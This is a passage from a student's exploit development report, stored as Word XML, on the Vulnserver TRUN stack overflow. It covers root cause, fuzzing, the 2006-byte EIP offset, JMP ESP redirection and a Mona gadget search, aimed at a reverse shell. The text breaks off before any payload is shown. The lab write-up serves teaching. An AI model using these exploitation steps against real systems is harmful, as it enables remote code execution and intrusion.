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000000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnserver TRUN Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack-Based Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Development Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: S</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Engineering Student</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">September 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Target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000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">32-bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerable Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TRUN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack-based buffer overflow (CWE-121)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="000000" w:sz="4"/>
              <w:left w:val="single" w:color="000000" w:sz="4"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="single" w:color="000000" w:sz="4"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immunity Debugger, Mona.py, Python 3, msfvenom, netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnserver is an intentionally vulnerable Windows TCP server commonly used to practice classic stack-based buffer overflow exploitation. It exposes several commands over a raw socket interface; this report documents the discovery and exploitation of a stack overflow in the TRUN command, resulting in remote code execution via a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Root Cause Analysis (Source Code Review)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Before fuzzing the target, the vulnserver source code was reviewed to identify the underlying cause of the overflow rather than treating the target as a black box. The handler for the TRUN command allocates a 3000-byte buffer for the received command data, copies up to 3000 bytes of attacker-controlled input into it, and then passes that buffer to Function3:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5029200" cy="24056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29200" cy="2405649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure A — TRUN command handler. TrunBuf is allocated with malloc(3000) and populated via strncpy(TrunBuf, RecvBuf, 3000) — i.e. up to 3000 attacker-controlled bytes — before being passed directly into Function3().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Function3, however, copies its input into a fixed, much smaller stack buffer using strcpy, which performs no bounds checking at all:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3657600" cy="13274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57600" cy="1327432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure B — Function3(). Buffer2S is only 2000 bytes, but strcpy(Buffer2S, Input) copies the entire input string regardless of length.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the root cause of the vulnerability: Function3 is fed a buffer that can be up to 3000 bytes long, but only allocates 2000 bytes of stack space to receive it, and uses strcpy — which copies until it hits a null terminator, not until it hits a length limit. Any TRUN command longer than 2000 bytes therefore overflows Buffer2S, overwriting adjacent stack memory including, at a sufficient offset, the saved return address. This directly explains why the crashes observed during fuzzing (Section 4) occur once the payload exceeds roughly 2000 bytes, and confirms the vulnerability as a classic unchecked strcpy stack buffer overflow (CWE-121 / CWE-787).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Vulnerability Discovery (Fuzzing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">With the vulnerable code path identified, the exact crash threshold and offset were confirmed dynamically. Rather than using a cyclic pattern generator at this stage, the vulnerable buffer was located through an incremental fuzzing loop: a Python script sent the TRUN command with a payload that grew in a loop, sending it and waiting for a response after each iteration, until the target stopped responding and the debugger caught an access violation. This confirmed that a crash was reproducible and gave an approximate buffer size at which the overflow occurred, consistent with the 2000-byte Buffer2S limit identified in the source review above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="330943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309439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1 — Initial fuzzing script sending an incrementally-sized "A" buffer prefixed with the TRUN command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending this buffer against the target produced an access violation in Immunity Debugger:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="32985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298595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2 — Access violation triggered in Immunity Debugger. The stack pane shows the buffer landing as a long run of the repeating byte 0x41 (ASCII 'A'), confirming the padding directly overwrote saved stack data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The crash confirmed that user-controlled input was overwriting saved data on the stack. The next step was to determine the precise offset at which the saved return address itself is overwritten, so that EIP could be controlled independently of the rest of the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Confirming the Offset and EIP Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">With the approximate crash size known, the padding was fixed at 2006 bytes of "A" and a distinct 4-byte marker ("ZZZZ") was appended immediately after it. If the offset was correct, this marker — and only this marker — would appear in EIP at the moment of the crash, confirming both the exact offset and clean control over the instruction pointer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4114800" cy="33418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14800" cy="3341885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3 — Updated script: 2006 bytes of padding followed by a 4-byte "ZZZZ" return-address marker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-sending this buffer produced the following crash state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="3416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416480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4 — EIP overwritten cleanly with 0x5A5A5A5A, the hex representation of "ZZZZ". EBP shows 0x41414141 (the "A" padding), and the status bar reports an access violation when executing [5A5A5A5A] — the CPU attempted to jump to an unmapped address, since "ZZZZ" is not a valid instruction location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">This confirmed two things: the exact offset to EIP is 2006 bytes, and EIP is fully and cleanly attacker-controlled at that offset — a direct EIP overwrite rather than an SEH-based crash. This is the ideal primitive for a classic JMP ESP-style exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: a cyclic/De Bruijn pattern (e.g. via msf-pattern_create) is the more standard and scalable way to determine this offset in a single crash, and would be the preferred approach for buffers where the exact crash size is not already known in advance. It was not required here since both the source code review and the incremental fuzzing loop had already narrowed the crash size closely enough to confirm the offset directly with a marker value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Redirecting Execution: Why JMP ESP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">At the moment a function returns and EIP is redirected, the stack pointer (ESP) has already been incremented past the overwritten return address — meaning ESP points to whatever data immediately follows it in the buffer. By placing shellcode (preceded by a NOP sled for a safety margin) directly after the return address in the payload, redirecting execution to any instruction that performs JMP ESP causes the CPU to jump straight into attacker-controlled memory, without needing to know the shellcode's absolute stack address in advance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2926080" cy="22015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26080" cy="2201580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5 — Two-hop redirection: the overwritten return address points to a JMP ESP gadget in module code; that instruction then jumps to ESP, which lands in the NOP sled leading into the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">For this technique to be reliable, the JMP ESP gadget must live at a fixed, predictable address — meaning the module it comes from must not use ASLR, rebasing, or other load-time randomization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Locating a JMP ESP Gadget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Mona.py was used to search all loaded modules for a usable JMP ESP instruction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="4"/>
          <w:bottom w:val="single" w:color="000000" w:sz="4"/>
          <w:left w:val="single" w:color="000000" w:sz="4"/>
          <w:right w:val="single" w:color="000000" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="FFFFFF" w:val="clear"/>
        <w:spacing w:after="200" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">!mona jmp -r esp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="2"/>
          <w:bottom w:val="single" w:color="000000" w:sz="2"/>
          <w:left w:val="single" w:color="000000" w:sz="2"/>
          <w:right w:val="single" w:color="000000" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="191304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1913047"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6 — Mona.py output listing 9 candidate JMP ESP addresses, all inside essfunc.dll, a helper DLL shipped with vulnserver.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">essfunc.dll was an ideal gadget source: Mona's module table confirmed it has ASLR, Rebase, SafeSEH, and CFG all set to False, meaning any address inside it remains fixed across restarts and is not protected against being used as a jump target. The first candidate returned was selected:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="000000" w:sz="4"/>
          <w:bottom w:val="single" w:color="000000" w:sz="4"/>
